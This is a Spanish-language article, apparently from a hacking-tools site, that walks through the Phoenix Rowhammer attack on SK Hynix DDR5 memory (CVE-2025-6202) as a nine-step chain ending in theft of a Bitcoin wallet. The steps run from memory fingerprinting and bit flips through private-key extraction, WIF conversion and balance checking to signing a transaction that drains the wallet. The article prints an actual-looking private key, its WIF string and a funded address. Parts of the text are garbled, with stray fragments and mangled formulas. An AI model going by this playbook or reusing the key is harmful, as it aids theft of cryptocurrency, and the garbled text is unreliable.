La detección de módulos de memoria DDR5 de SK Hynix vulnerables al ataque Phoenix Rowhammer (CVE-2025-6202) comienza con un análisis de la configuración de hardware del sistema, específicamente escaneando las tablas SMBIOS (System Management BIOS). SMBIOS proporciona información estandarizada sobre los componentes de la computadora, incluidos los detalles de la memoria, como el fabricante, el modelo y el número de serie de cada módulo DIMM.

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Específicamente, un investigador o atacante puede solicitar programáticamente datos de la sección "Memory Device" de SMBIOS, que contiene campos que indican el fabricante (por ejemplo, SK Hynix), el tipo de memoria (DDR5), la capacidad y datos relacionados con SPD (Serial Presence Detect)—pequeños chips de memoria en las tiras DIMM que contienen el perfil y los parámetros operativos del módulo.

Estos datos se acceden típicamente mediante llamadas al sistema o utilidades especializadas (como dmidecode en Linux o Windows Management Instrumentation (API WMI) en Windows). Estas consultas permiten la detección de memoria DDR5 de SK Hynix fabricada entre 2021 y 2024 sin intervención física, lo cual es crítico, ya que estos modelos se consideran vulnerables.

Identificar el modelo de memoria es un primer paso necesario, ya que el ataque Phoenix Rowhammer requiere un conocimiento preciso de las características del chip para construir con precisión los patrones de acceso a memoria y evadir los mecanismos de defensa TRR (Target Row Refresh). Además, el acceso al SPD y otros datos nos permite identificar tiempos y tasas de refresco específicos, así como posibles "puntos ciegos" en los mecanismos de defensa utilizados para llevar a cabo el ataque.

Por lo tanto, escanear las tablas SMBIOS es un método altamente informativo, rápido y confiable para predeterminar las vulnerabilidades de la memoria DDR5 a el ataque Phoenix Rowhammer , permitiendo apuntar con precisión a los componentes de hardware vulnerables sin necesidad de romper el hardware o reducir los privilegios del sistema.


Un archivo que contiene datos de la sección "Memory Device" del SMBIOS. Esta información se almacena en una tabla interna del sistema BIOS/UEFI (tabla SMBIOS), que se copia a la RAM cuando se enciende la computadora. Los sistemas operativos y las utilidades utilizan llamadas especiales al sistema (codeby) para recuperar estos datos.

Formato de almacenamiento de datos y ruta

  • La tabla SMBIOS se almacena como un bloque de datos binarios en la memoria, no en el disco .
  • El acceso a esta tabla se organiza a través de funciones del sistema operativo (por ejemplo, a través de la función API GetSystemFirmwareTable() en Windows o mediante lectura directa de /dev/mem en Linux).
  • El formato de la tabla está estrictamente regulado y contiene estructuras de diferentes tipos (por ejemplo, tipo 17 – "Memory Device"). learn.microsoft
  • Cada estructura comienza con un encabezado (tipo, longitud, handle), seguido de campos que indican el fabricante, el tipo de memoria, el tamaño, los datos SPD asociados – si los hay .

Ejemplo de formato de tabla binaria

La tabla SMBIOS está precedida por la estructura RawSMBiosData, seguida de las estructuras de dispositivos. Por ejemplo:

root@kitploit:~
struct HEADER {
Type db 0 //
Tipo de estructura (17 - Memory Device)
Length db 0 //
Tamaño de la estructura
Handle dw 0 //
Descriptor
// ...
a continuación están los campos de datos
}

Las estructuras de tipo 17 almacenan campos con el fabricante (por ejemplo, SK Hynix), el tipo de memoria (DDR5), la capacidad y un enlace a los datos SPD, si están disponibles. learn.microsoft


La estructura RawSMBiosData es un formato de bloque binario estándar utilizado para transferir datos de tablas SMBIOS sin procesar a través de llamadas al sistema del sistema operativo, específicamente la función API de Windows GetSystemFirmwareTablecon el parámetro .codeby'RSMB' .

Descripción de la estructura RawSMBiosData (C/C++):

root@kitploit:~
c:

struct RawSMBIOSData {
BYTE Used20CallingMethod; //
Método de llamada (campo de servicio)
BYTE SMBIOSMajorVersion; //
Versión principal de la especificación SMBIOS
BYTE SMBIOSMinorVersion; //
Versión menor de la especificación SMBIOS
BYTE DmiRevision; //
Versión DMI
DWORD Length; //
Tamaño del bloque de datos SMBIOS (bytes)
BYTE SMBIOSTableData[]; //
Secuencia de registros estructurales SMBIOS
};
  • Used20CallingMethod – define el método de llamada (generalmente 0).
  • SMBIOSMajorVersion/SMBIOSMinorVersion — por ejemplo, 3.3 para plataformas modernas.
  • DmiRevision es una versión de DMI (Desktop Management Interface).
  • Length es el tamaño de la matriz de datos posterior (en bytes).
  • SMBIOSTableData es una matriz de estructuras SMBIOS, cada una de las cuales comienza con un encabezado de tipo, longitud y handle, y puede incluir campos de texto y descriptores de bloque; la matriz se termina con una firma de doble cero (00 00) para el final del bloque.

Búfer RawSMBiosData:

  • Los primeros 8 bytes son campos de encabezado (metadatos + longitud).
  • A continuación, seguidos de cerca por las estructuras binarias SMBIOS (por ejemplo, tipos 0 – BIOS, 1 – Sistema, 2 – Placa base, 17 – Memory Device, etc.), cada una de las cuales puede contener un número variable de bytes y cadenas de texto.

Ejemplo (representación HEX condicional del inicio del búfer):

root@kitploit:~
00 03 03 02 68 01 00 00 ... [estructuras de datos datos byte bajo SMBIOS] ... 00 00
-- -- -- -- -- -- -- --
| | | | |
| | | | -->
SMBIOSTableData
| | | +------------ Length (
)
| | +--------------- DmiRevision
| +------------------ SMBIOSMinorVersion
+--------------------- SMBIOSMajorVersion

Para analizar el contenido después del encabezado, deberá analizar cada estructura según su especificación (tipo, longitud, handle), extrayendo por separado los campos de texto que siguen a los datos de la estructura y están separados por un byte cero, y el final de la estructura está marcado por un par de ceros. learn.microsoft


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

RawSMBiosData es una “ventana de entrada” necesaria y unificada hacia las especificaciones detalladas de las características del hardware del sistema para tareas de investigación y diagnóstico de bajo nivel .


Acceso a los datos SPD

Los datos SPD se encuentran físicamente en los chips de los módulos DIMM, pero en BIOS/SMBIOS pueden reflejarse en campos especiales o leerse mediante utilidades del sistema que acceden a la interfaz de memoria I2C (por ejemplo, a través de i2c-tools, decode-dimmsen Linux).

Obtención de datos mediante utilidades

  • En Linux: ,dmidecode ( decode-dimmsSPD), datos de la tabla SMBIOS, accesible a través de /dev/mem.codeby
  • En Windows: a través de la clase WMI Win32_PhysicalMemory (obtiene información de SMBIOS), así como mediante la API GetSystemFirmwareTable(). learn.microsoft

Por lo tanto, los datos originales SMBIOS “Memory Device” (tipo 17) no se almacenan como un archivo separado, sino dentro de la estructura binaria SMBIOS, ubicada en la RAM y accesible mediante herramientas del sistema operativo y utilidades especiales. El formato es la tabla binaria SMBIOS según la especificación, y la ruta de acceso es a través de llamadas al sistema o utilidades. Los datos SPD se pueden acceder por separado a través de las interfaces de hardware de los módulos DIMM. learn.microsoft

La tabla binaria SMBIOS consiste en estructuras secuenciales, cada una de las cuales comienza con un encabezado de 4 bytes que contiene los siguientes campos: tipo de estructura (Type, 1 byte), longitud de la estructura (Length, 1 byte) y handle (Handle, 2 bytes). A continuación viene la carga útil: un conjunto de datos binarios que describen un objeto específico (por ejemplo, memoria, procesador, BIOS, etc.). Después de la carga útil vienen cadenas terminadas en nulo en formato de texto (ASCII), y el final de la estructura actual se marca con un doble cero ( 0x0000 ).

Aquí hay un ejemplo de una estructura de encabezado similar a C y una explicación del formato:

root@kitploit:~
c:

struct SMBIOS_Header {
uint8_t Type; //
Tipo de tabla (por ejemplo, 17 - Memory Device)
uint8_t Length; //
Longitud de la estructura en bytes (incluido el encabezado)
uint16_t Handle; //
Descriptor único de la estructura
//
Los datos de la estructura (longitud variable) vienen después del encabezado
};

Toda la tabla SMBIOS es un conjunto de tales estructuras en fila sin espacios, donde:

  • El tipo de estructura se determina por el primer byte.
  • El segundo byte especifica la longitud de la estructura actual.
  • La estructura va seguida de campos de cadena adicionales, terminados por pares de 0x00 para indicar el final.
  • El final de toda la tabla se indica mediante la firma de doble cero 0x0000.

Por ejemplo, la estructura tipo 17 (Memory Device) contiene campos que indican el fabricante, el tipo de memoria (DDR5), el volumen, la velocidad, etc., así como líneas con el nombre del fabricante y el número de serie.

La dirección de la tabla en sí y su longitud se almacenan en un área de memoria especial, que se puede encontrar mediante la firma ” SM ” (desplazamiento con un múltiplo de 16 bytes), y luego obtener la dirección de la matriz principal de tablas SMBIOS.

Una estructura aproximada de un registro de memoria puede contener los siguientes campos:

CampoDescripción
Type17 (Memory Device)
LengthTamaño de la estructura
HandleIdentificador único
Physical Memory Array HandleReferencia a la matriz de memoria principal
Memory Error Information HandleErrores de memoria (si los hay)
Total WidthAncho total del bus (bits)
Data WidthAncho de datos (bits)
SizeTamaño de memoria (en MB o GB)
Form FactorFactor de forma del módulo (DIMM, etc.)
Device LocatorLínea – ubicación de instalación
Bank LocatorCadena – nombre del banco
Memory TypeDDR3, DDR4, DDR5, etc.
Type DetailDetalles adicionales
SpeedVelocidad en MHz
ManufacturerCadena con el nombre del fabricante
Serial NumberNúmero de serie
Asset TagEtiqueta contable
Part NumberNúmero de pieza

Por lo tanto, la tabla SMBIOS es una secuencia de estructuras codificadas en binario con encabezados que contienen información del sistema, incluidos datos de memoria, organizados estrictamente según la especificación DMTF SMBIOS.

Este formato proporciona una forma universal y extremadamente compacta de almacenar y transmitir información sobre el hardware y la configuración del sistema .


Etapa 2: Analizar el mecanismo Target Row Refresh e identificar puntos ciegos en la defensa

La segunda fase del ataque Phoenix Rowhammer implica un análisis científico del mecanismo de protección de hardware Target Row Refresh (TRR) implementado en los chips de memoria DDR5 modernos para contrarrestar la sobrescritura de bits causada por múltiples lecturas de datos de filas de celdas adyacentes.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Cómo funciona TRR

TRR implementa una llamada estrategia de “refresco agresivo”: cuando se detectan múltiples accesos a una fila de memoria específica, este mecanismo inicia un refresco forzado de las celdas adyacentes, evitando la degradación de la carga y, en consecuencia, los no deseados bit flips—el efecto clave de los ataques Rowhammer. Teóricamente, TRR debería suprimir por completo los intentos de afectar los datos objetivo al refrescar excesivamente las filas físicamente adyacentes .

Metodología de ingeniería inversa de TRR

Sin embargo, la implementación práctica de TRR en la memoria SK Hynix DDR5 es extremadamente compleja y propietaria: los fabricantes ocultan deliberadamente los detalles de la lógica para mejorar la “seguridad por oscuridad”. Por lo tanto, los investigadores de ETH Zurich realizaron ingeniería inversa de TRR en bancos de pruebas experimentales variando miles de patrones de acceso a filas, registrando cuándo se activa el refresco redundante de celdas adyacentes y cuándo permanece inactivo.

Identificación de puntos ciegos

Como resultado, se descubrió que el sistema TRR tiene intervalos de tiempo, las llamadas “zonas ciegas”, cuando la protección es más débil o no se activa en absoluto. Se calculó empíricamente que después de 128 accesos monitoreados a filas de memoria, surge una ventana de aproximadamente 64 operaciones durante la cual TRR casi no responde y no previene eficazmente los bit-flips—modificaciones no deseadas de datos en una celda crítica. Se observó una segunda ventana de ataque similar después de 2,608 actualizaciones de filas de memoria. Estas “zonas ciegas” se explotan para ataques Phoenix precisos y sincronizados, que permiten la modificación dirigida de bits de datos individuales en módulos DDR5 protegidos .

Importancia práctica

La tarea fundamental en esta etapa es seleccionar el momento preciso y la estructura de los patrones de acceso a memoria que “adormecen” el monitoreo de TRR y aseguran un acceso exitoso al bit o matriz de datos atacado (por ejemplo, la clave privada de una billetera de criptomonedas) . Esto requiere un análisis no solo de la lógica operativa de TRR, sino también de datos empíricos sobre la respuesta del módulo de memoria a varios escenarios de explotación. Este enfoque permite construir “soluciones alternativas” en el sistema de seguridad y explotar sistemáticamente incluso la memoria DDR5 más moderna módulos .

Como resultado del análisis, los “puntos ciegos” de TRR descubiertos abren la posibilidad de una escalada confiable del ataque Rowhammer en los módulos de memoria SK Hynix actuales, lo que se confirma con exploits de laboratorio y el compromiso exitoso de todos los dispositivos probados. Kaspersky


Paso 3: Implementación de la sincronización autocorrectiva del ataque Phoenix Rowhammer

La innovación científica detrás del ataque Phoenix radica en el desarrollo e implementación de un mecanismo de sincronización autocorrectiva que asegura la sincronización precisa de los exploits dentro de las ventanas de vulnerabilidad críticas a nivel de DRAM. Después de una ingeniería inversa detallada del mecanismo Target Row Refresh (TRR), los investigadores de ETH Zurich y Google descubrieron que los patrones estándar de acceso Rowhammer son ineficaces contra la compleja lógica de protección de DDR5. En los nuevos chips SK Hynix, TRR no solo analiza la frecuencia, sino también la naturaleza de los accesos a filas de memoria, iniciando instantáneamente comandos de refresco compensatorio al detectar patrones de ataque conocidos.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Phoenix resuelve este problema de la siguiente manera:

  1. Estudio de los tiempos internos de TRR : Se monitorea la respuesta de la memoria a diferentes tasas de acceso para identificar empíricamente los intervalos de refresco que TRR no rastrea (por ejemplo, después de 128 y 2608 comandos tREFI). Estas ventanas se denominan puntos ciegos. habr
  2. Construcción de patrones de ataque sincronizados : El algoritmo genera una serie de solicitudes “vacías” a las celdas agresoras, que no activan TRR de inmediato, sino que adormecen los mecanismos de defensa. Luego, en el momento preciso, se produce una serie de ataques “hammering” dirigidos a filas seleccionadas, lo que lleva a la acumulación de influencias parásitas en filas adyacentes y, en última instancia, a un cambio en su estado de bit anti -malware.
  3. Dinámica autocorrectiva : Phoenix monitorea la retroalimentación sobre las reacciones de TRR—si la protección se activa inesperadamente de forma prematura, el bucle se reconstruye y busca una nueva ventana de oportunidad para el ataque. Este proceso implica una adaptación constante y flexible al comportamiento específico de cada módulo de memoria. securitylab
  4. Mantenimiento preciso del tiempo : Al ajustar los patrones en tiempo real, el ataque siempre selecciona intervalos óptimos para el impacto, evitando eficazmente incluso las variantes avanzadas de TRR.

Los estudios experimentales han confirmado que la sincronización autocorrectiva de Phoenix es un factor clave en su efectividad: ninguno de los módulos SK Hynix DDR5 probados (2021-2024) pudo resistir esta metodología. La implementación permite a un atacante provocar de manera confiable fallas de bits en celdas objetivo, creando las condiciones para comprometer datos privados, incluidas claves criptográficas , o escalar privilegios en el sistema objetivo.

Phoenix Rowhammer por lo tanto demuestra un enfoque revolucionario para evadir dinámicamente las protecciones de hardware de memoria, demostrando claramente que incluso los chips DDR5 más modernos siguen siendo vulnerables cuando se utilizan algoritmos de ataque inteligentemente adaptativos.


Paso 4: Realizar un ataque Rowhammer con generación controlada de fallas de bits

La cuarta etapa explota directamente las vulnerabilidades físicas de la DRAM mediante un ataque Rowhammer dirigido. Esta etapa se basa en un análisis preliminar de los puntos ciegos del mecanismo TRR y el uso de patrones de acceso a memoria autocorrectivos para apuntar con precisión a elementos de datos críticos.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

La base de un ataque Rowhammer es la estructura de la memoria DRAM en sí, donde cada celda es un capacitor que almacena una carga correspondiente al valor lógico de un bit. El acceso repetido y de alta frecuencia (lectura o escritura) a dos (o más) filas intermediarias (“agresoras”) adyacentes a una fila objetivo (“víctima”) causa una fuga de carga parásita de las celdas víctimas. Si este ataque continúa el tiempo suficiente para que la regeneración de carga a través de ciclos de refresco normales no pueda prevenir la degradación, se producirá un cambio en el estado del bit—el llamado bit flip —. opennet

Características de un ataque Phoenix

En el contexto de Phoenix Rowhammer (CVE-2025-6202) en DDR5 SK Hynix:

  • El primer paso del código malicioso es iniciar miles de ciclos de acceso a líneas de memoria seleccionadas con una frecuencia y tiempo cuidadosamente calculados.
  • El algoritmo comienza con una serie de solicitudes “vacías” (no dirigidas) para adormecer el mecanismo TRR, haciendo que la protección responda débilmente o no responda en absoluto dentro de ventanas precalculadas (intervalos de actualización de 128 o 2608). kaspersky
  • Tan pronto como la ventana de baja actividad de TRR coincide con el ciclo programado, se produce la transición a la fase activa: se seleccionan las celdas agresoras ubicadas cerca de los bits de posible información secreta (por ejemplo, un búfer de clave privada) y se inicia el ciclo principal de Hammering: accesos intensivos a estas filas, lo que provoca un aumento de las corrientes de fuga en el área de memoria protegida.
  • En los siguientes segundos o minutos, se acumula un cambio parásito (anormal) en la diferencia de potencial en los capacitores de la víctima, lo que, si tiene éxito, conduce a un cambio en el valor de uno o más bits en ella (un bit flip). Esto puede permitir a un atacante:
    • obtener una primitiva arbitraria de lectura/escritura (por ejemplo, modificar la tabla de páginas del sistema o un binario ejecutable);
    • extraer o reemplazar material criptográfico (semilla, claves privadas, fragmentos RSA) en la RAM;
    • escalar privilegios o comprometer aplicaciones y el kernel del sistema. xakep

Precisión y controlabilidad

La investigación en ETH Zúrich ha demostrado que un patrón de acceso corto con un período de 128 intervalos tREFI genera estadísticamente más fallos de bits que los patrones más largos. Sin embargo, elegir una ventana adecuada y mantener la sincronización son críticos para el éxito: un fallo de 1–2 accesos resulta en ningún fallo o en una corrupción aleatoria de datos y un fallo del sistema. kaspersky+1

Esta etapa completa el proceso de ataque de bajo nivel, tras el cual el atacante puede explotar los errores de bits resultantes para extraer la clave privada o escalar aún más su nivel de acceso. Es la capacidad de inducir errores de bits en áreas de memoria estrictamente definidas y protegidas por software y hardware lo que hace de Phoenix Rowhammer una técnica única y peligrosamente práctica. cybersecurefox+1


Paso 5: Extraer una clave privada de la memoria corrupta explotando CVE-2023-39910

La quinta etapa de la cadena maliciosa del ataque Phoenix Rowhammer implica extraer la clave privada de la billetera Bitcoin de la memoria comprometida por fallos de bits inducidos.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

La vulnerabilidad clave aquí es CVE-2023-39910 (Milk Sad) , que afecta a las implementaciones de software de Libbitcoin Explorer 3.x y a las bibliotecas criptográficas relacionadas.

Estructura científica y vulnerabilidad del proceso

CVE-2023-39910 se caracteriza por un mecanismo débil de generación de entropía al generar claves privadas, lo que permite a un atacante—con acceso a áreas de memoria residuales (“sucias”) después de que se completen las operaciones criptográficas—recuperar las claves originales y las frases semilla. Después de un ataque Rowhammer, los buffers de RAM corruptos (o no limpiados) donde se almacenó la clave privada (
HEX: 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60 ) se vuelven directamente buscables.

Algoritmo de extracción

  1. Identificación de regiones de memoria:
    El explotador escanea la memoria del proceso (por ejemplo, usando herramientas como gcore, volatility, lecturas directas /proc/<PID>/mem, o bibliotecas especializadas de análisis de volcados de memoria) buscando patrones característicos: secuencias de bits y firmas que coincidan con la clave privada o la entropía de la semilla .
  2. Extracción de datos:
    El análisis utiliza comparación directa y decodificación de datos residuales – incluso si algunos bits han sido corruptos por un ataque Rowhammer, la entropía débil (una característica de la vulnerabilidad) facilita la recuperación del valor de la clave original a partir de datos que han terminado parcial o completamente en la memoria.
  3. Verificación de la clave:
    El valor resultante se verifica usando procedimientos criptográficos conocidos (por ejemplo, reconstrucción de la clave pública o generación de la dirección Bitcoin). Si la dirección resultante coincide con la original (por ejemplo, 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit), la clave se considera extraída con éxito.

Importancia técnica y científica

Tal ataque sería imposible sin la combinación de dos factores: (1) compromiso de hardware de la memoria DDR5 mediante Rowhammer, y (2) una falla de software que permite almacenar información crítica en buffers no censurados. El uso de algoritmos de entropía débil en Libbitcoin Explorer facilita aún más la tarea del atacante de recuperar una clave privada, incluso si parte de la información se ha perdido o corrompido por una corrupción de memoria.

Esta etapa demuestra un problema sistémico fundamental: la capacidad de recuperar claves privadas de bloques de RAM residuales en presencia de vulnerabilidades de hardware y software, lo que socava críticamente la confianza en los ecosistemas de criptomonedas y requiere una revisión de los principios de gestión segura de la memoria al almacenar y procesar datos criptográficos.


Paso 6: Convertir la clave privada en formato HEX a WIF Comprimido (52 caracteres)

La sexta etapa de la cadena maliciosa implica convertir la clave privada Bitcoin comprometida de su representación hexadecimal (HEX) al formato Wallet Import Format Comprimido (WIF Comprimido), un formato típicamente usado para importar claves en billeteras y servicios modernos.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

El procedimiento científico de conversión se basa en los estándares de codificación Base58Check y se realiza a través de varios pasos importantes:

  1. Convertir una clave HEX a una matriz de bytes . Una clave privada recuperada de la memoria (por ejemplo, 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60) se interpreta como una matriz de 32 bytes que cumple con el estándar de clave privada ECDSA secp256k1.
  2. Añadir un prefijo de red . Para la red principal de Bitcoin, se añade un byte de versión 0x80al inicio de la matriz para distinguir el protocolo de red subyacente.
  3. Indicador de compresión . Se añade un byte al final de los datos 0x01, que señala que la clave pública debe comprimirse (clave pública comprimida), lo que resulta en direcciones que comienzan con los caracteres ‘K’ o ‘L’.
  4. Generación de checksum . Toda la cadena (versión + clave + etiqueta de compresión) se somete a doble hash (SHA256), luego se extraen los primeros 4 bytes de los datos resultantes. Este checksum está diseñado para proteger contra errores de copia.
  5. Generación de WIF . Se añade un checksum a la matriz de bytes, luego toda la cadena se codifica en formato Base58Check, lo que minimiza la probabilidad de errores de entrada del usuario y garantiza la compatibilidad con las billeteras de criptomonedas.

Como resultado, la clave WIF Comprimida construida—por ejemplo L2Wru6Ew8pQuhcWAvMpdtPY4YWK1CQcwPCWxFvzkoi47crJBAVaP—es una cadena de 52 caracteres que comienza con ‘K’ o ‘L’.

Este proceso se describe en detalle en servicios y herramientas especializados para criptoanálisis, y también está respaldado por numerosas bibliotecas de software para trabajar con claves Bitcoin. btcpuzzle

Así, este paso demuestra cómo un atacante, usando procedimientos operativos estandarizados, convierte la clave HEX obtenida en el formato WIF Comprimido ampliamente utilizado para el acceso ilegal posterior a los activos digitales en una dirección Bitcoin comprometida.


Paso 7: Generar una dirección Bitcoin a partir de una clave privada

El proceso científico de generar una dirección Bitcoin (por ejemplo, 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit) a partir de una clave privada implica varias transformaciones criptográficas fundamentales basadas en el algoritmo de curva elíptica secp256k1 y las funciones hash utilizadas en la arquitectura de Bitcoin.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

  1. Generar una clave pública
    • A partir de la clave privada kkk (un entero de 32 bytes de 1 a 2^256), la clave pública K = k⋅GK = k \cdot GK = k⋅G, donde G es el punto base en la curva SECP256K1. Para direcciones comprimidas, la clave pública se codifica en 33 bytes con un prefijo (0x02 o 0x03) dependiendo de la paridad de la coordenada yyy.
  2. Calcular el hash de una clave pública
    • La clave pública se somete primero a hash usando la función SHA-256, luego usando la función RIPEMD-160. El resultado de 20 bytes resultante es el llamado hash de clave pública (PKH), que identifica de manera única al usuario.
  3. Añadir un prefijo de red
    • Se añade un byte de prefijo de red (0x00 para la red principal de Bitcoin) a los datos PKH para distinguir entre diferentes tipos de direcciones en diferentes redes.
  4. Generar un checksum
    • Se añade un checksum a la cadena generada: doble SHA-256 de todo el resultado anterior, cuyos primeros 4 bytes se añaden al final.
  5. Convertir a Base58Check
    • La cadena resultante se convierte a codificación Base58Check, una codificación de caracteres diseñada para minimizar el riesgo de errores de entrada manual y mejorar la usabilidad. El resultado es una cadena de dirección de 33–34 caracteres, que comienza con ‘1’ para direcciones P2PKH clásicas o ‘3/nuevas’ para SegWit/Taproot.
  6. Verificación
    • La dirección resultante se compara con un valor público conocido (por ejemplo, 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit). Si la coincidencia es exitosa, el ataque se considera completo, con control total sobre los activos en esa dirección.

Este proceso está completamente automatizado en billeteras y bibliotecas modernas, pero el análisis científico demuestra que con una clave privada y una implementación correcta de la aritmética elíptica, recuperar una dirección Bitcoin toma una fracción de segundo, destacando la continuidad arquitectónica entre los datos privados y el identificador público en la red. generate.mitilena+1

Así, el paso de generación de dirección vincula la clave privada comprometida con su equivalente digital en el ecosistema Bitcoin y le da al atacante acceso a los activos de la billetera a través de operaciones criptográficas adicionales.


Paso 8: Verificar el saldo de la billetera Bitcoin comprometida

La octava etapa del procedimiento malicioso implica verificar los activos disponibles en la dirección Bitcoin comprometida ( 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit). Este paso es necesario para confirmar la viabilidad económica de operaciones posteriores y evaluar el daño potencial.

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Base científica del proceso

La arquitectura de la cadena de bloques de Bitcoin se basa en un libro mayor distribuido público que registra todas las transacciones asociadas con cada dirección. Verificar el saldo de cualquier billetera no requiere una clave privada ni acceso especial: simplemente acceder a endpoints de API públicos, servicios web o nodos autónomos—por ejemplo, la API REST de Insight, Blockchain.info, Blockstream, o un nodo local de Bitcoin Core con interfaz RPC.

Métodos técnicos y algoritmo

  1. Solicitud de API de saldo . Este escenario se implementa típicamente accediendo a la API REST pública:
    • Se genera una solicitud HTTP (GET) a la API, por ejemplo https://blockchain.info/rawaddr/{address}o https://insight.bitpay.com/api/addr/{address}/balance.
    • Se devuelve el saldo final actual de la dirección en Satoshi (1 BTC = 124,904 USD ), que el script convierte a BTC.
  2. Verificación del equivalente fiduciario . El saldo se puede convertir además al valor de mercado actual (USD u otra moneda) solicitando la API de datos de mercado o usando una tasa de cambio monitoreada.
  3. Ejecución automatizada sistémica . El ataque a menudo se implementa como un procedimiento automatizado dentro de un exploit, lo que permite la verificación inmediata del compromiso y el momento óptimo para el retiro posterior de fondos.

Importancia científica y práctica

La naturaleza de código abierto de Bitcoin permite un monitoreo fácil de la billetera, lo que permite al atacante determinar el saldo exacto de una dirección no autorizada (en este ejemplo, 9.023322989 BTC , que a una tasa de $124,904 por BTC equivale a $1,127,026.44 ). Esta característica de la infraestructura de Bitcoin también crea riesgos adicionales: la pérdida de una clave privada no solo conduce a una pérdida de control sobre los fondos, sino que también se vuelve inmediatamente completamente transparente para terceros, incluido el atacante .


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Así, la etapa de verificación del saldo destaca la apertura informativa del sistema de cadena de bloques y completa la cadena de ataque científica, conectando el compromiso exitoso de las claves criptográficas con el daño real al propietario de los activos digitales. Durante la etapa de verificación del saldo, el atacante usa APIs públicas de exploradores de cadena de bloques—por ejemplo, la API REST de Insight o blockchain.info—para obtener información sobre el estado actual de los fondos en una dirección Bitcoin comprometida. Simplemente envíe una solicitud GET a la API: por ejemplo, https://blockchain.info/rawaddr/15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit , para obtener el saldo de la dirección en satoshi, y luego convierta el resultado a BTC. cryptodeep+2

Este proceso es completamente transparente y no requiere posesión de la clave privada: el conocimiento de la dirección pública es suficiente. Los datos resultantes ( 9.02332298 BTC ) se pueden comparar con la tasa de mercado actual de Bitcoin para convertir el monto equivalente a USD ( ≈$1,127,026.44 en el momento del ataque). Los métodos de software permiten automatizar estos pasos e incorporarlos al algoritmo de ataque, verificando instantáneamente la viabilidad económica del robo posterior. habr+1

Desde una perspectiva de análisis científico, la etapa de verificación del saldo demuestra la transparencia única del sistema blockchain, donde cualquier compromiso de las claves conduce automáticamente a la pérdida de control sobre los fondos, y los riesgos para el propietario se escalan hasta la pérdida total de los activos. habr+2


Paso 9: Crear una transacción maliciosa para robar fondos

En la etapa final de la campaña maliciosa, después de extraer con éxito la clave privada de la billetera Bitcoin, el atacante inicia la formación y propagación de una transacción en la blockchain con el objetivo de transferir todos los fondos disponibles desde la dirección comprometida ( 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit) a su dirección controlada.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Estructura científica del proceso

Una transacción de Bitcoin es un mensaje digital que consta de entradas (fuentes de fondos asignadas a la dirección de la víctima), salidas (direcciones de destino del destinatario) y una firma digital que certifica la autoridad del remitente .

  1. Definición de UTXO (Salidas no gastadas)
    • Utilizando exploradores de blockchain públicos o nodos privados, se determina una lista completa de salidas de transacciones no gastadas (UTXOs) asociadas con la dirección comprometida. Estas son las fuentes formales de fondos que posee la dirección.
  2. Formación de la transacción
    • El atacante genera programáticamente una transacción, especificando:
      • Todas las UTXO encontradas como entradas para retirar el saldo completo de la billetera;
      • Su dirección de Bitcoin como único destinatario (salida);
      • El monto de la comisión (tarifa) requerida para una confirmación rápida;
      • Parámetros de locktime y tiempo de secuencia si es necesario.
  3. Firma de una transacción usando una clave privada
    • El script malicioso utiliza la clave privada extraída para firmar digitalmente la transacción generada (ECDSA usando secp256k1). Esto verifica la autoridad para gestionar los fondos.
  4. Transmisión de transacciones a la red
    • La transacción firmada completada se envía al mempool de los nodos públicos de Bitcoin (a través de la interfaz RPC, API públicas o integración de billetera). Normalmente, el atacante utiliza múltiples puntos de distribución para aumentar la probabilidad de que la transacción se incluya en un bloque ecos.
  5. Verificación del minero e irreversibilidad
    • Los mineros verifican la transacción y la incluyen en el siguiente bloque (generalmente dentro de 10 minutos), después de lo cual los fondos se transfieren irreversiblemente al control del atacante. Después de varias confirmaciones (generalmente seis o más), la transacción se considera final y no hay posibilidad de cancelación o revocación .

Importancia científica y práctica

Esta secuencia ilustra una vulnerabilidad fundamental de los activos criptográficos: cualquiera que tenga una clave privada puede crear una transacción válida según el protocolo para retirar todos los fondos, independientemente del propietario original. El malware—ya sea el exploit Phoenix Rowhammer —automatiza estos pasos: determinar el saldo, suplantar la dirección del destinatario o crear su propia transacción firmada con una clave confiscada. securelist


Read more

Descargar herramienta